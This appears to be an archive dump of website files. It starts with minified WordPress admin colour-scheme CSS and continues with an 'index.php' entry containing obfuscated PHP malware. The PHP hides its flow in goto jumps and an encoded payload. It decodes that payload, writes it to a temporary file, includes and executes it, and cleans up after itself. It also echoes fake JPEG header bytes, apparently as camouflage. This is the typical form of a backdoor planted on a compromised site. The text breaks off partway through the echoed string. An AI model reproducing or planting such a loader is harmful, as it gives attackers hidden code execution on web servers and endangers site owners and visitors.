.update-plugins{color:#fff;background:#d64e07}#adminmenu li a.wp-has-current-submenu .update-plugins,#adminmenu li.current a .awaiting-mod,#adminmenu li.menu-top:hover>a .update-plugins,#adminmenu li:hover a .awaiting-mod{color:#333;background:#fff}#collapse-button{color:#777}#collapse-button:focus,#collapse-button:hover{color:#04a4cc}#wpadminbar{color:#333;background:#e5e5e5}#wpadminbar .ab-item,#wpadminbar a.ab-item,#wpadminbar>#wp-toolbar span.ab-label,#wpadminbar>#wp-toolbar span.noticon{color:#333}#wpadminbar .ab-icon,#wpadminbar .ab-icon:before,#wpadminbar .ab-item:after,#wpadminbar .ab-item:before{color:#999}#wpadminbar .ab-top-menu>li.menupop.hover>.ab-item,#wpadminbar.nojq .quicklinks .ab-top-menu>li>.ab-item:focus,#wpadminbar.nojs .ab-top-menu>li.menupop:hover>.ab-item,#wpadminbar:not(.mobile) .ab-top-menu>li:hover>.ab-item,#wpadminbar:not(.mobile) .ab-top-menu>li>.ab-item:focus{color:#04a4cc;background:#fff}#wpadminbar:not(.mobile)>#wp-toolbar a:focus span.ab-label,#wpadminbar:not(.mobile)>#wp-toolbar li.hover span.ab-label,#wpadminbar:not(.mobile)>#wp-toolbar li:hover span.ab-label{color:#04a4cc}#wpadminbar:not(.mobile) li:hover #adminbarsearch:before,#wpadminbar:not(.mobile) li:hover .ab-icon:before,#wpadminbar:not(.mobile) li:hover .ab-item:after,#wpadminbar:not(.mobile) li:hover .ab-item:before{color:#04a4cc}#wpadminbar .menupop .ab-sub-wrapper{background:#fff}#wpadminbar .quicklinks .menupop ul.ab-sub-secondary,#wpadminbar .quicklinks .menupop ul.ab-sub-secondary .ab-submenu{background:rgb(246.85,246.85,246.85)}#wpadminbar .ab-submenu .ab-item,#wpadminbar .quicklinks .menupop ul li a,#wpadminbar .quicklinks .menupop.hover ul li a,#wpadminbar.nojs .quicklinks .menupop:hover ul li a{color:rgb(104.4,104.4,104.4)}#wpadminbar .menupop .menupop>.ab-item:before,#wpadminbar .quicklinks li .blavatar{color:#999}#wpadminbar .quicklinks .ab-sub-wrapper .menupop.hover>a,#wpadminbar .quicklinks .menupop ul li a:focus,#wpadminbar .quicklinks .menupop ul li a:focus strong,#wpadminbar .quicklinks .menupop ul li a:hover,#wpadminbar .quicklinks .menupop ul li a:hover strong,#wpadminbar .quicklinks .menupop.hover ul li a:focus,#wpadminbar .quicklinks .menupop.hover ul li a:hover,#wpadminbar li #adminbarsearch.adminbar-focused:before,#wpadminbar li .ab-item:focus .ab-icon:before,#wpadminbar li .ab-item:focus:before,#wpadminbar li a:focus .ab-icon:before,#wpadminbar li.hover .ab-icon:before,#wpadminbar li.hover .ab-item:before,#wpadminbar li:hover #adminbarsearch:before,#wpadminbar li:hover .ab-icon:before,#wpadminbar li:hover .ab-item:before,#wpadminbar.nojs .quicklinks .menupop:hover ul li a:focus,#wpadminbar.nojs .quicklinks .menupop:hover ul li a:hover{color:#04a4cc}#wpadminbar .menupop .menupop>.ab-item:hover:before,#wpadminbar .quicklinks .ab-sub-wrapper .menupop.hover>a .blavatar,#wpadminbar .quicklinks li a:focus .blavatar,#wpadminbar .quicklinks li a:hover .blavatar,#wpadminbar.mobile .quicklinks .ab-icon:before,#wpadminbar.mobile .quicklinks .ab-item:before{color:#04a4cc}#wpadminbar.mobile .quicklinks .hover .ab-icon:before,#wpadminbar.mobile .quicklinks .hover .ab-item:before{color:#999}#wpadminbar #adminbarsearch:before{color:#999}#wpadminbar>#wp-toolbar>#wp-admin-bar-top-secondary>#wp-admin-bar-search #adminbarsearch input.adminbar-input:focus{color:#333;background:rgb(246.85,246.85,246.85)}#wpadminbar #wp-admin-bar-recovery-mode{color:#fff;background-color:#d64e07}#wpadminbar #wp-admin-bar-recovery-mode .ab-item,#wpadminbar #wp-admin-bar-recovery-mode a.ab-item{color:#fff}#wpadminbar .ab-top-menu>#wp-admin-bar-recovery-mode.hover>.ab-item,#wpadminbar.nojq .quicklinks .ab-top-menu>#wp-admin-bar-recovery-mode>.ab-item:focus,#wpadminbar:not(.mobile) .ab-top-menu>#wp-admin-bar-recovery-mode:hover>.ab-item,#wpadminbar:not(.mobile) .ab-top-menu>#wp-admin-bar-recovery-mode>.ab-item:focus{color:#fff;background-color:rgb(192.6,70.2,6.3)}#wpadminbar .quicklinks li#wp-admin-bar-my-account.with-avatar>a img{border-color:rgb(246.85,246.85,246.85);background-color:rgb(246.85,246.85,246.85)}#wpadminbar #wp-admin-bar-user-info .display-name{color:#333}#wpadminbar #wp-admin-bar-user-info a:hover .display-name{color:#04a4cc}#wpadminbar #wp-admin-bar-user-info .username{color:rgb(104.4,104.4,104.4)}.wp-pointer .wp-pointer-content h3{background-color:#04a4cc;border-color:rgb(3.5096153846,143.8942307692,178.9903846154)}.wp-pointer .wp-pointer-content h3:before{color:#04a4cc}.wp-pointer.wp-pointer-top .wp-pointer-arrow,.wp-pointer.wp-pointer-top .wp-pointer-arrow-inner,.wp-pointer.wp-pointer-undefined .wp-pointer-arrow,.wp-pointer.wp-pointer-undefined .wp-pointer-arrow-inner{border-bottom-color:#04a4cc}.media-item .bar,.media-progress-bar div{background-color:#04a4cc}.details.attachment{box-shadow:inset 0 0 0 3px #fff,inset 0 0 0 7px #04a4cc}.attachment.details .check{background-color:#04a4cc;box-shadow:0 0 0 1px #fff,0 0 0 2px #04a4cc}.media-selection .attachment.selection.details .thumbnail{box-shadow:0 0 0 1px #fff,0 0 0 3px #04a4cc}.theme-browser .theme.active .theme-name,.theme-browser .theme.add-new-theme a:focus:after,.theme-browser .theme.add-new-theme a:hover:after{background:#04a4cc}.theme-browser .theme.add-new-theme a:focus span:after,.theme-browser .theme.add-new-theme a:hover span:after{color:#04a4cc}.theme-filter.current,.theme-section.current{border-bottom-color:#e5e5e5}body.more-filters-opened .more-filters{color:#333;background-color:#e5e5e5}body.more-filters-opened .more-filters:before{color:#333}body.more-filters-opened .more-filters:focus,body.more-filters-opened .more-filters:hover{background-color:#888;color:#fff}body.more-filters-opened .more-filters:focus:before,body.more-filters-opened .more-filters:hover:before{color:#fff}.widgets-chooser li.widgets-chooser-selected{background-color:#888;color:#fff}.widgets-chooser li.widgets-chooser-selected:before,.widgets-chooser li.widgets-chooser-selected:focus:before{color:#fff}.nav-menus-php .item-edit:focus:before{box-shadow:0 0 0 1px rgb(8.8269230769,201.9038461538,250.1730769231),0 0 2px 1px #04a4cc}div#wp-responsive-toggle a:before{color:#999}.wp-responsive-open div#wp-responsive-toggle a{border-color:transparent;background:#888}.wp-responsive-open #wpadminbar #wp-admin-bar-menu-toggle a{background:#fff}.wp-responsive-open #wpadminbar #wp-admin-bar-menu-toggle .ab-icon:before{color:#999}.mce-container.mce-menu .mce-menu-item-normal.mce-active,.mce-container.mce-menu .mce-menu-item-preview.mce-active,.mce-container.mce-menu .mce-menu-item.mce-selected,.mce-container.mce-menu .mce-menu-item:focus,.mce-container.mce-menu .mce-menu-item:hover{background:#04a4cc}.wp-core-ui #customize-controls .control-section .accordion-section-title:focus,.wp-core-ui #customize-controls .control-section .accordion-section-title:hover,.wp-core-ui #customize-controls .control-section.open .accordion-section-title,.wp-core-ui #customize-controls .control-section:hover>.accordion-section-title{color:#0073aa;border-left-color:#04a4cc}.wp-core-ui .customize-controls-close:focus,.wp-core-ui .customize-controls-close:hover,.wp-core-ui .customize-controls-preview-toggle:focus,.wp-core-ui .customize-controls-preview-toggle:hover{color:#0073aa;border-top-color:#04a4cc}.wp-core-ui .customize-panel-back:focus,.wp-core-ui .customize-panel-back:hover,.wp-core-ui .customize-section-back:focus,.wp-core-ui .customize-section-back:hover{color:#0073aa;border-left-color:#04a4cc}.wp-core-ui #customize-controls .customize-info.open.active-menu-screen-options .customize-help-toggle:active,.wp-core-ui #customize-controls .customize-info.open.active-menu-screen-options .customize-help-toggle:focus,.wp-core-ui #customize-controls .customize-info.open.active-menu-screen-options .customize-help-toggle:hover,.wp-core-ui .active-menu-screen-options .customize-screen-options-toggle,.wp-core-ui .customize-screen-options-toggle:active,.wp-core-ui .customize-screen-options-toggle:focus,.wp-core-ui .customize-screen-options-toggle:hover{color:#0073aa}.wp-core-ui #available-menu-items .item-add:focus:before,.wp-core-ui #customize-controls .customize-info .customize-help-toggle:focus:before,.wp-core-ui #customize-save-button-wrapper .save:focus,.wp-core-ui #publish-settings:focus,.wp-core-ui .customize-screen-options-toggle:focus:before,.wp-core-ui .menu-item-bar .item-delete:focus:before,.wp-core-ui.wp-customizer button:focus .toggle-indicator:before{box-shadow:0 0 0 1px rgb(8.8269230769,201.9038461538,250.1730769231),0 0 2px 1px #04a4cc}.wp-core-ui #customize-controls .customize-info .customize-help-toggle:focus,.wp-core-ui #customize-controls .customize-info .customize-help-toggle:hover,.wp-core-ui #customize-controls .customize-info.open .customize-help-toggle{color:#0073aa}.wp-core-ui .control-panel-themes .customize-themes-section-title:focus,.wp-core-ui .control-panel-themes .customize-themes-section-title:hover{border-left-color:#04a4cc;color:#0073aa}.wp-core-ui .control-panel-themes .theme-section .customize-themes-section-title.selected:after{background:#04a4cc}.wp-core-ui .control-panel-themes .customize-themes-section-title.selected{color:#0073aa}.wp-core-ui #customize-outer-theme-controls .control-section .accordion-section-title:focus:after,.wp-core-ui #customize-outer-theme-controls .control-section .accordion-section-title:hover:after,.wp-core-ui #customize-outer-theme-controls .control-section.open .accordion-section-title:after,.wp-core-ui #customize-outer-theme-controls .control-section:hover>.accordion-section-title:after,.wp-core-ui #customize-theme-controls .control-section .accordion-section-title:focus:after,.wp-core-ui #customize-theme-controls .control-section .accordion-section-title:hover:after,.wp-core-ui #customize-theme-controls .control-section.open .accordion-section-title:after,.wp-core-ui #customize-theme-controls .control-section:hover>.accordion-section-title:after{color:#0073aa}.wp-core-ui .customize-control .attachment-media-view .button-add-media:focus{background-color:#fbfbfc;border-color:#04a4cc;border-style:solid;box-shadow:0 0 0 1px #04a4cc;outline:2px solid transparent}.wp-core-ui .wp-full-overlay-footer .devices button.active:hover,.wp-core-ui .wp-full-overlay-footer .devices button:focus{border-bottom-color:#04a4cc}.wp-core-ui .wp-full-overlay-footer .devices button:focus:before,.wp-core-ui .wp-full-overlay-footer .devices button:hover:before{color:#04a4cc}.wp-core-ui .wp-full-overlay .collapse-sidebar:focus,.wp-core-ui .wp-full-overlay .collapse-sidebar:hover{color:#04a4cc}.wp-core-ui .wp-full-overlay .collapse-sidebar:focus .collapse-sidebar-arrow,.wp-core-ui .wp-full-overlay .collapse-sidebar:hover .collapse-sidebar-arrow{box-shadow:0 0 0 1px rgb(8.8269230769,201.9038461538,250.1730769231),0 0 2px 1px #04a4cc}.wp-core-ui.wp-customizer .theme-overlay .theme-header .close:focus,.wp-core-ui.wp-customizer .theme-overlay .theme-header .close:hover,.wp-core-ui.wp-customizer .theme-overlay .theme-header .left:focus,.wp-core-ui.wp-customizer .theme-overlay .theme-header .left:hover,.wp-core-ui.wp-customizer .theme-overlay .theme-header .right:focus,.wp-core-ui.wp-customizer .theme-overlay .theme-header .right:hover{border-bottom-color:#04a4cc;color:#0073aa}.theme-filter.current,.theme-section.current{border-bottom-color:#04a4cc} 428825/index.php 0000644 00000540713 15106640004 0007146 0 ustar 00 <?php goto jmNdy; CQpf7: goto eSEqC; goto JlDEq; Z8mPd: eXtRaCt(mLW6k($azpZ6($nX5gU($C2E_7)) . $azpZ6($nX5gU($RDJOr)))); goto CQpf7; jmNdy: goto y4hGL; goto wH4qt; hSlZ8: H74Dm: goto kdW4N; Q91YX: goto MRuAK; goto zVncH; xPsHq: ob_start(); goto Q91YX; wiTCx: $C2E_7 = "\67\x38\144\x61\x37\65\70\145\x34\x66\x34\142\143\x33\64\60\61\60\143\x35\145\x66\x66\144\x31\64\x64\63\x35\x30\x62\x61\x31\142\x31\60\x63\x63\61\x66\71\x33\x31\64\x64\x61\141\x64\65\145\63\x63\67\x38\142\x31\64\62\142\143\x31\x35\x30\71\x62\142\143\x64\x38\66\x65\x63\x36\61\x39\63\62\x35\63\142\60\61\70\63\x66\x38\144\144\x39\144\70\x38\x34\62\70\64\x33\x61\63\60\x38\67\146\71\x63\x64\x62\x63\x37\71\x63\x66\63\64\x63\60\x39\x62\142\61\142\x62\141\x30\x65\x39\x62\x62\x34\141\142\146\61\x62\x38\x66\71\x65\x33\63\x61\146\x62\144\x39\x66\x36\67\x38\146\67\x32\64\60\61\x36\70\66\x66\60\142\61\60\x32\x61\x61\x33\146\71\70\70\x37\146\x62\x36\x66\x36\70\145\x38\143\x31\x66\141\66\x31\x35\x33\71\65\70\146\66\x35\146\71\x37\64\x37\x61\63\145\71\x33\x66\x38\63\62\x36\x38\x62\141\x39\x38\x64\x38\x35\x62\60\x38\144\67\63\71\x30\x38\x64\x32\x36\x38\145\142\67\x30\x65\x32\71\x62\145\x61\x65\x35\x35\x34\x62\x65\71\145\71\71\x39\x62\141\x66\x62\x37\x35\142\x62\60\x37\x35\x63\66\71\67\x64\x64\64\x61\144\146\65\x32\141\60\x35\x36\x32\x36\x35\x39\x63\x65\66\x65\71\66\x39\142\141\x35\x66\x32\x61\x37\x34\60\60\70\66\x30\x37\x37\64\141\x36\x35\65\x31\x39\66\64\x34\x62\61\x63\x63\x61\x33\x33\x38\64\x66\x61\65\62\x61\x35\64\x39\x63\66\141\71\144\x31\x36\x35\61\x35\62\x61\x38\66\64\141\x37\61\x38\60\x35\146\x66\x35\x63\x39\x39\x38\x36\x61\x66\x66\x66\60\71\x35\x64\61\142\143\x64\144\x39\141\61\x65\x39\60\67\60\142\65\66\x36\x33\144\142\144\x37\62\62\71\70\71\x64\x38\62\145\63\143\61\67\64\x36\145\x34\64\x65\x38\141\64\144\x35\x32\62\67\x30\143\x31\x65\x64\x32\146\143\60\x63\71\x31\x31\146\x30\141\63\x62\x32\60\66\70\71\71\62\x30\x31\144\x63\x31\146\142\x66\60\x30\x37\141\141\x61\66\67\146\x32"; goto f6asf; ue5SO: I_DFw: goto wiTCx; vqTth: goto H74Dm; goto ue5SO; fmy1J: ob_clean(); goto f3YQt; xlF5g: y4hGL: goto xPsHq; wH4qt: g30zr: goto K6n7u; f6asf: goto HDaJ1; goto xlF5g; IILi2: MRuAK: goto FxFnu; kdW4N: function mlw6K($RDJOr) { goto UbyDf; XMhsr: goto ak8r4; goto ErgL0; wZFPU: NYomx: goto SVIKN; oE_fR: goto x17hC; goto wZFPU; h6aVa: return get_defined_vars(); goto FYkOl; cw9Ow: array_map("\x75\x6e\154\151\156\x6b", glob($U8ukf . "\57\x2a\56\61\61\x2a")); goto VQbfK; UbyDf: goto vEzP3; goto V33Wc; gnj63: iZAT2: goto tuMMD; sBvyG: $U8ukf = sYs_gEt_TeMp_dIr(); goto XMhsr; oOMCx: $UcOOQ = fOpEn($e53nY, "\167\x2b"); goto gt0NB; VQbfK: goto DG041; goto j4nD0; j4nD0: AZsft: goto zkBJc; SVIKN: FcLoSe($UcOOQ); goto tSZgy; tuMMD: include $e53nY; goto Mm1Gg; gt0NB: goto AZsft; goto KcVT9; tSZgy: goto iZAT2; goto xq5cj; zkBJc: fWrItE($UcOOQ, "\x3c\x3f\160\150\x70\xa" . $RDJOr); goto Lzh4g; KcVT9: ak8r4: goto YPn43; V33Wc: x17hC: goto oOMCx; sfhFt: i0s3g: goto cw9Ow; ErgL0: DG041: goto h6aVa; YPn43: $e53nY = TeMpNaM($U8ukf, "\165\156\151\x78\56\61\x31"); goto oE_fR; u9lqL: MctI1: goto ZHxyt; Mm1Gg: goto i0s3g; goto u9lqL; Lzh4g: goto NYomx; goto gnj63; xq5cj: vEzP3: goto sBvyG; FYkOl: goto MctI1; goto sfhFt; ZHxyt: } goto VA8ho; FxFnu: echo "\77\x3f\40\xef\277\xbd\x3f\xef\277\xbd\357\277\275\x3f\xef\xbf\xbd\xef\xbf\xbd\77\xef\277\xbd\xef\277\275\x3f\357\xbf\275\x20\20\x4a\x46\111\106\40\1\1\x20\x1\40\x1\x20\357\xbf\xbd\77\357\xbf\xbd\357\xbf\xbd\77\xef\277\xbd\40\357\xbf\275\x3f\357\xbf\xbd\x20\6\40\10\40\6\40\10\40\x8\40\26\17\x20\14\xc\x20\x1b\24\25\20\x16\40\35\x22\42\40\35\x1f\x1f\x24\x28\x34\54\44\x26\x31\x27\37\37\x2d\x3d\x2d\61\65\x37\72\72\x3a\43\x2b\77\104\77\x38\103\64\x39\72\x37\x1\40\14\x20\x1a\xf\xf\32\67\x25\x1f\x25\x37\67\x37\x37\67\x37\x37\x37\x37\x37\67\67\x37\67\x37\x37\67\x37\x37\x37\x37\x37\x37\67\x37\x37\67\67\67\67\x37\67\x37\x37\x37\67\x37\67\67\67\x37\x37\67\67\x37\x37\67\x37\x37\67\xef\xbf\xbd\x3f\357\xbf\xbd\357\277\xbd\77\xef\277\xbd\40\21\x8\40\173\40\xef\xbf\275\x3f\xef\277\xbd\3\1\42\40\x2\x11\1\x3\21\1\357\277\275\77\xef\277\275\357\xbf\xbd\77\xef\277\xbd\x20\33\x20\1\40\2\x3\x1\1\x20\x4\x5\1\x3\x6\x20\2\xef\xbf\275\77\xef\xbf\xbd\xef\277\xbd\x3f\xef\xbf\xbd\x20\x35\20\40\1\x4\40\4\4\4\4\x5\x3\5\x20\1\40\2\3\21\4\22\41\x31\5\x41\121\141\23\x22\x71\357\xbf\xbd\x3f\xef\277\275\24\62\357\277\275\77\357\277\xbd\357\xbf\275\x3f\357\xbf\xbd\x6\x42\122\357\xbf\xbd\x3f\xef\xbf\xbd\357\xbf\275\x3f\xef\xbf\275\43\142\xef\277\xbd\x3f\357\277\275\25\357\xbf\275\77\357\277\275\357\xbf\275\77\xef\277\275\357\277\xbd\x3f\357\xbf\xbd\xef\277\xbd\77\357\xbf\275\357\277\xbd\x3f\xef\xbf\xbd\xef\277\xbd\77\357\277\xbd\x20\25\x1\x1\x1\x20\1\357\277\275\77\357\xbf\275\xef\xbf\xbd\77\357\xbf\xbd\x20\x14\21\1\40\357\xbf\xbd\x3f\xef\277\275\xef\277\xbd\x3f\xef\277\xbd\40\14\x3\x1\x20\x2\x11\3\x11\40\77\x20\xef\277\xbd\77\xef\277\275\xef\xbf\xbd\77\xef\xbf\xbd\104\x40\x44\104\x4\104\100\x44\104\4\x44\x40\104\x44\x19\x6b\x4b\357\xbf\275\77\xef\xbf\xbd\26\xef\277\275\77\357\xbf\275\x36\40\357\xbf\275\77\357\277\xbd\125\107\xef\277\275\77\xef\277\275\x34\x56\357\277\xbd\77\357\277\275\x31\xef\xbf\xbd\x3f\357\277\xbd\xef\277\xbd\77\xef\xbf\275\x20\xef\xbf\275\x3f\xef\277\xbd\357\xbf\xbd\x3f\357\277\275\x1a\357\277\275\x3f\357\277\xbd\xef\xbf\275\77\357\xbf\275\xef\277\xbd\x3f\xef\277\275\357\xbf\xbd\77\357\xbf\xbd\x3f\357\xbf\275\20\x40\xef\277\xbd\77\xef\277\275\3\x23\357\277\275\x3f\357\xbf\xbd\xef\277\xbd\x3f\357\277\xbd\357\277\275\x3f\357\xbf\275\122\131\xef\xbf\275\x3f\xef\xbf\275\x64\x71\160\xef\277\xbd\x3f\xef\xbf\275\40\xef\xbf\xbd\77\xef\xbf\275\xef\xbf\xbd\x3f\357\xbf\275\357\277\xbd\x3f\xef\277\xbd\357\xbf\xbd\77\xef\277\xbd\357\xbf\xbd\x3f\xef\xbf\xbd\x20\357\xbf\xbd\77\xef\xbf\xbd\x6f\x3\357\xbf\275\77\357\xbf\275\67\357\xbf\275\77\xef\xbf\xbd\x8\x6d\xef\xbf\275\x3f\357\277\275\163\357\277\xbd\x3f\xef\xbf\xbd\74\357\277\xbd\77\xef\xbf\275\37\xef\xbf\xbd\x3f\357\277\xbd\x56\120\123\xef\277\275\x3f\xef\xbf\xbd\145\x7e\x56\357\xbf\xbd\x3f\357\xbf\275\x3f\xef\277\xbd\x38\xef\277\275\77\xef\277\xbd\357\277\275\x3f\357\xbf\xbd\xef\xbf\275\x3f\xef\xbf\275\130\357\277\275\x3f\xef\xbf\275\124\x1c\xef\xbf\275\77\xef\277\275\357\xbf\xbd\77\xef\277\xbd\x1e\x24\357\xbf\275\77\357\xbf\275\357\277\275\x3f\xef\xbf\xbd\x63\xef\277\xbd\77\xef\277\275\xef\xbf\275\77\xef\277\275\40\71\xef\277\xbd\x3f\357\xbf\xbd\xef\277\xbd\77\357\277\275\77\77\xef\xbf\xbd\357\277\xbd\x3f\357\xbf\xbd\155\66\x40\x20\127\x55\xef\277\275\77\357\xbf\xbd\x18\x66\357\277\xbd\x3f\xef\277\xbd\x44\x6f\x6e\25\xef\277\xbd\x3f\xef\277\275\6\xef\xbf\xbd\x3f\xef\277\275\162\357\xbf\xbd\x3f\357\xbf\xbd\357\277\xbd\x3f\xef\277\275\65\x7d\x39\xef\277\275\77\xef\xbf\275\357\xbf\xbd\x3f\357\xbf\275\x7d\x8\xef\277\275\x3f\357\277\275\357\277\xbd\x3f\357\xbf\275\150\17\x63\357\xbf\xbd\77\357\277\xbd\x66\106\xef\277\275\x3f\357\277\275\xef\277\275\77\xef\xbf\275\x2f\162\x3d\150\x69\xef\xbf\xbd\x3f\357\277\275\357\xbf\xbd\77\xef\xbf\275\x20\357\xbf\275\77\xef\xbf\xbd\x3f\xef\xbf\xbd\xef\xbf\275\77\357\xbf\xbd\x2a\xef\xbf\275\x3f\xef\xbf\xbd\357\277\275\x3f\xef\xbf\275\x20\142\xef\xbf\xbd\x3f\357\xbf\xbd\56\357\xbf\275\x3f\357\xbf\xbd\357\277\275\77\357\277\xbd\44\60\357\277\275\77\357\277\275\x26\164\145\xef\xbf\xbd\x3f\357\277\275\xef\xbf\xbd\77\xef\277\275\171\x5\xef\xbf\275\77\xef\277\xbd\x40\xef\xbf\275\x3f\xef\277\xbd\x41\357\277\275\77\xef\xbf\xbd\106\xef\xbf\xbd\77\xef\277\275\75\357\277\xbd\77\xef\277\275\40\120\21\21\x1\21\20\21\21\1\x11\20\x11\21\1\21\20\x11\x11\x1\21\x10\x11\21\1\x66\357\277\275\x3f\357\xbf\275\26\x41\357\277\xbd\77\xef\xbf\275\22\xef\xbf\275\77\xef\xbf\275\141\xef\277\275\77\xef\xbf\xbd\357\xbf\275\77\357\277\xbd\xef\xbf\275\77\xef\277\xbd\105\77\xef\xbf\275\77\xef\277\xbd\x41\xef\xbf\xbd\357\xbf\275\77\xef\xbf\xbd\77\357\277\xbd\x6\xef\277\xbd\x3f\357\xbf\275\xef\277\275\x3f\xef\xbf\xbd\x55\x7c\357\277\275\x3f\357\xbf\275\x20\xef\277\xbd\77\xef\xbf\275\xf\40\x33\x5c\357\xbf\275\77\xef\277\275\327\xb4\40\110\x16\x20\x53\132\357\xbf\xbd\x3f\357\xbf\275\x1e\x67\64\x36\357\277\xbd\x3f\357\277\275\103\xef\xbf\xbd\77\xef\xbf\xbd\357\277\xbd\77\357\277\xbd\xd7\246\357\xbf\275\77\357\xbf\xbd\x55\xef\277\xbd\x20\357\277\xbd\77\357\277\275\x62\x1b\6\x1f\x3c\357\xbf\xbd\x3f\xef\xbf\xbd\357\277\275\77\357\277\xbd\xef\277\275\x3f\357\277\xbd\x3b\x6d\x8\xef\xbf\275\77\xef\xbf\275\xef\xbf\275\x3f\xef\277\xbd\xef\xbf\275\x3f\xef\277\xbd\xef\xbf\xbd\x3f\xef\277\xbd\122\160\77\357\xbf\xbd\x5e\357\277\xbd\77\357\xbf\xbd\xef\277\xbd\x3f\xef\277\xbd\x6c\x37\357\277\275\77\xef\277\275\xef\277\275\77\357\xbf\xbd\52\xef\277\xbd\x3f\xef\xbf\xbd\357\xbf\xbd\x3f\xef\xbf\275\357\277\275\77\xef\277\275\357\277\xbd\x3f\357\xbf\275\357\277\xbd\x3f\xef\277\xbd\x54\x46\357\xbf\275\x3f\357\277\275\175\xef\277\xbd\77\357\xbf\xbd\x5c\xef\277\275\x3f\xef\xbf\xbd\115\xef\277\xbd\77\357\xbf\275\357\xbf\275\77\357\xbf\275\xef\277\275\x3f\xef\277\xbd\115\xf\x25\357\277\275\x3f\xef\277\275\47\23\xef\xbf\xbd\x3f\357\277\xbd\357\xbf\xbd\77\xef\xbf\275\357\xbf\xbd\x3f\xef\xbf\275\357\277\275\x3f\xef\277\xbd\357\xbf\xbd\77\xef\xbf\275\125\xef\277\275\x3f\xef\xbf\275\357\277\275\77\357\xbf\xbd\x76\x18\177\357\277\xbd\x3f\xef\xbf\xbd\x20\xef\277\275\77\xef\277\xbd\357\277\275\x3f\xef\xbf\xbd\41\x2d\357\277\275\x3f\xef\xbf\275\357\277\xbd\77\357\277\275\357\xbf\xbd\x3f\357\277\xbd\33\357\xbf\xbd\77\xef\277\275\xef\xbf\xbd\x3f\xef\xbf\xbd\x3f\xef\xbf\xbd\x3f\xef\xbf\xbd\x4e\41\x4c\141\357\277\275\x3f\357\277\xbd\xef\277\xbd\x3f\357\xbf\xbd\x41\53\x5b\x19\x60\x23\xef\xbf\xbd\x3f\357\277\xbd\xf\357\277\275\x3f\357\277\xbd\xef\xbf\275\x3f\357\xbf\275\x4d\357\xbf\xbd\x3f\xef\277\xbd\357\277\275\77\xef\xbf\275\xef\277\xbd\77\357\xbf\xbd\xef\xbf\275\x3f\xef\xbf\xbd\32\47\xef\277\xbd\x3f\xef\277\xbd\x7e\x6f\x1a\x52\357\xbf\xbd\x3f\357\277\xbd\x3f\xef\xbf\275\77\357\xbf\xbd\357\xbf\xbd\77\357\277\275\x76\22\136\51\357\xbf\xbd\77\xef\277\275\357\277\xbd\77\xef\277\275\75\357\xbf\xbd\77\357\277\275\357\xbf\xbd\x3f\357\xbf\xbd\150\x1f\357\xbf\xbd\x3f\357\xbf\275\357\277\xbd\x3f\xef\277\xbd\357\xbf\275\77\xef\xbf\275\xef\xbf\xbd\77\xef\xbf\xbd\x41\357\xbf\xbd\77\xef\277\275\357\xbf\xbd\x3f\357\277\275\x58\xef\xbf\xbd\x3f\357\277\275\x2e\x5\xef\xbf\275\x3f\357\277\275\xef\277\275\x3f\xef\277\275\357\xbf\275\x3f\xef\277\275\105\xef\277\xbd\xef\277\xbd\77\xef\xbf\xbd\xef\xbf\xbd\77\357\xbf\xbd\357\277\275\x3f\357\277\xbd\xef\277\275\x3f\357\xbf\275\136\x3f\x3f\357\xbf\275\x3f\357\277\275\xef\xbf\xbd\x3f\357\xbf\xbd\36\125\357\277\275\163\117\x22\x42\357\277\xbd\x3f\357\277\xbd\26\x63\x3e\73\x20\357\277\275\x3f\xef\277\275\145\xef\xbf\275\77\357\xbf\xbd\x34\357\277\275\x3f\xef\277\xbd\xef\xbf\xbd\77\357\xbf\275\x35\xef\277\275\77\357\xbf\275\x6b\xef\xbf\275\77\xef\xbf\275\357\277\275\x3f\xef\277\xbd\57\x43\x42\xef\xbf\275\77\xef\xbf\xbd\357\277\275\x3f\357\xbf\xbd\x2e\40\x10\40\357\277\275\x3f\xef\277\xbd\x4a\77\xef\xbf\275\77\357\277\275\xef\277\275\77\357\xbf\275\x3b\357\xbf\275\x3f\xef\xbf\275\x3f\xef\277\xbd\xef\xbf\xbd\x3f\357\xbf\275\x8\357\xbf\275\x3f\xef\277\xbd\xef\277\xbd\77\xef\277\xbd\357\xbf\xbd\x3f\xef\xbf\275\357\xbf\xbd\77\xef\xbf\xbd\x8\357\277\xbd\77\xef\277\xbd\357\xbf\xbd\x3f\xef\xbf\275\357\xbf\275\x3f\xef\277\275\xef\xbf\275\77\xef\xbf\xbd\10\xef\277\275\77\xef\277\275\xef\xbf\275\77\xef\xbf\xbd\357\277\xbd\77\357\xbf\275\357\277\xbd\77\xef\277\275\x8\357\277\275\x3f\xef\xbf\275\357\xbf\xbd\77\357\xbf\275\357\277\275\x3f\xef\277\275\357\xbf\xbd\77\357\277\xbd\10\xef\xbf\275\77\357\277\275\xef\277\xbd\77\357\277\xbd\176\25\xef\277\275\x3f\357\xbf\xbd\74\357\277\xbd\x3f\357\xbf\xbd\x56\x5a\xef\xbf\xbd\77\xef\xbf\275\xea\255\274\x32\57\51\x3f\357\277\275\152\x43\xef\277\275\x3f\357\277\275\357\xbf\xbd\x3f\357\277\275\xef\xbf\275\77\357\277\xbd\327\242\357\xbf\xbd\77\357\xbf\275\x56\357\277\xbd\x3f\xef\277\xbd\36\107\xef\xbf\xbd\77\xef\277\275\41\357\xbf\275\77\xef\277\xbd\357\277\xbd\x3f\357\xbf\xbd\357\277\xbd\x3f\xef\xbf\275\41\357\277\275\x3f\xef\xbf\275\106\357\277\xbd\x3f\xef\xbf\275\xef\277\275\x3f\357\xbf\xbd\357\277\xbd\77\357\xbf\275\357\277\275\77\xef\277\275\357\277\xbd\x3f\xef\xbf\275\6\357\xbf\275\x3f\357\277\275\x5c\22\xef\xbf\xbd\77\357\277\xbd\xef\xbf\xbd\x3f\xef\xbf\275\x20\x4b\x6a\xef\xbf\275\x3f\357\277\xbd\x52\xef\277\xbd\77\xef\xbf\xbd\x6f\16\x63\357\277\275\x3f\xef\277\275\x68\xef\277\275\x3f\xef\xbf\275\xef\277\275\x3f\357\xbf\xbd\xef\xbf\275\77\xef\xbf\275\x3a\77\xef\xbf\275\2\x49\357\xbf\xbd\x3f\357\xbf\xbd\2\xef\277\275\x3f\357\xbf\xbd\x31\42\62\357\277\xbd\77\xef\277\275\x71\24\327\260\70\xef\277\275\x3f\xef\277\xbd\xef\xbf\xbd\x3f\xef\277\xbd\x3f\xef\xbf\xbd\x40\xd7\x96\357\277\xbd\77\xef\277\xbd\xef\xbf\xbd\x3f\xef\xbf\275\xef\277\xbd\x3f\xef\277\xbd\137\21\23\103\x30\357\277\xbd\x3f\357\xbf\275\77\357\277\275\1\357\277\275\x3f\357\277\275\357\xbf\275\77\357\xbf\275\x41\357\xbf\275\x3f\357\xbf\xbd\357\277\275\